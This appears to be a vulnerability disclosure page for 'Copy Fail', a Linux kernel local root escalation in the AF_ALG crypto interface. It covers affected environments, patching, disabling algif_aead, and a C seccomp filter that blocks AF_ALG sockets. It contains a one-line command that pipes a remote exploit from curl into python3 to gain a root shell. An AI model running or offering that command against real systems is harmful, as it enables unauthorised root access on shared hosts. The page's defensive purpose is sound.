
Copy Fail – CVE-2026-31431

Hacker News unsnap_biceps 0 views 3 min read

Same script, four distributions, four root shells — in one take. The same exploit binary works unmodified on every Linux distribution.

If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you're in scope.

Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro's default config, so the entire 2017 → patch window is in play out of the box.

Distributions we directly verified:

These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add to the list.

Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel.

The page cache is shared across the host. A pod with the right primitives compromises the node and crosses tenant boundaries.

GitHub Actions self-hosted runners, GitLab runners, Jenkins agents — anything that executes untrusted PR code as a regular user, on a shared kernel.

Notebook hosts, agent sandboxes, serverless functions, any tenant-supplied container or script.

Single-tenant production where only your team has shell access.

You're already the only user. The bug doesn't grant remote attackers access by itself, but any local code execution becomes root.

The PoC is published so defenders can verify their own systems and validate vendor patches.

Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib).
Targets /usr/bin/su by default; pass another setuid binary as argv[1].

$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)

Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026-31431

Patch first. Update your distribution's kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.

Before you can patch: disable the algif_aead module.

# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true

What does this break? For the vast majority of systems — nothing measurable.

For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.
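One way to implement the seccomp block described above, as an added example that is not part of the copy.fail page or Theori's code: a minimal seccomp-BPF filter that makes socket(AF_ALG, ...) return EPERM while leaving every other syscall untouched, so the algif_aead path is unreachable whether or not the kernel is patched. It assumes x86_64 or aarch64 Linux, spells out the kernel ABI constants itself so it builds without the linux-* headers, and the function names are the example's own.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>
/* Hypothetical example. Kernel ABI values are spelled out so it builds without <linux/seccomp.h>. */
#define MODE_FILTER 2                         /* SECCOMP_MODE_FILTER */
#define RET_KILL    0x00000000U               /* SECCOMP_RET_KILL */
#define RET_ALLOW   0x7fff0000U               /* SECCOMP_RET_ALLOW */
#define RET_EPERM   (0x00050000U | EPERM)     /* SECCOMP_RET_ERRNO | errno value */
#if defined(__x86_64__)
#define ARCH_ID 0xc000003eU                   /* AUDIT_ARCH_X86_64 */
#elif defined(__aarch64__)
#define ARCH_ID 0xc00000b7U                   /* AUDIT_ARCH_AARCH64 */
#else
#error "add the AUDIT_ARCH_* value for this architecture"
#endif
struct sock_filter { uint16_t code; uint8_t jt, jf; uint32_t k; };
struct sock_fprog  { uint16_t len; struct sock_filter *filter; };
#define LD_W_ABS(off) { 0x20, 0, 0, (off) }   /* A = seccomp_data[off]; nr @0, arch @4, args[0] @16 */
#define JEQ(v, t, f)  { 0x15, (t), (f), (v) }  /* if A == v skip t instructions, else skip f */
#define RET(v)        { 0x06, 0, 0, (v) }      /* return action v */
/* Install the filter for the calling thread and everything it spawns. Returns 0 on success. */
int install_af_alg_filter(void)
{
    struct sock_filter prog[] = {
        LD_W_ABS(4),  JEQ(ARCH_ID, 1, 0),     RET(RET_KILL),  /* foreign ABI: kill */
        LD_W_ABS(0),  JEQ(__NR_socket, 1, 0), RET(RET_ALLOW), /* not socket(): allow */
        LD_W_ABS(16), JEQ(AF_ALG, 0, 1),      RET(RET_EPERM), /* socket(AF_ALG, ..): EPERM */
        RET(RET_ALLOW),                                       /* any other family: allow */
    };
    struct sock_fprog fprog = { (uint16_t)(sizeof prog / sizeof prog[0]), prog };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0) return -1; /* required without CAP_SYS_ADMIN */
    return prctl(PR_SET_SECCOMP, MODE_FILTER, &fprog, 0, 0);
}
/* 1 if socket(AF_ALG, ...) is now refused with EPERM, 0 otherwise. */
int af_alg_is_blocked(void)
{
    int fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (fd >= 0) { close(fd); return 0; }
    return errno == EPERM;
}
int main(void)
{
    if (install_af_alg_filter() != 0) { perror("seccomp"); return 1; }
    printf("AF_ALG socket creation blocked: %s\n", af_alg_is_blocked() ? "yes" : "no");
    return 0;
}
```

The same rule expressed in a container runtime's seccomp profile (socket with arg0 == 38 returning EPERM) achieves the identical effect for Docker, containerd or Kubernetes workloads.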

Copy Fail was surfaced by Xint Code in about an hour of scan time against the Linux crypto/ subsystem. Full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up.

The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way — one operator prompt, no harnessing, prioritized findings with trigger and impact narratives.

Swept the database category — Redis, PostgreSQL, MariaDB. Zero human intervention.

Finalist in the AI Cyber Challenge hosted by DoD DARPA.

Most-winning team in DEF CON CTF history.
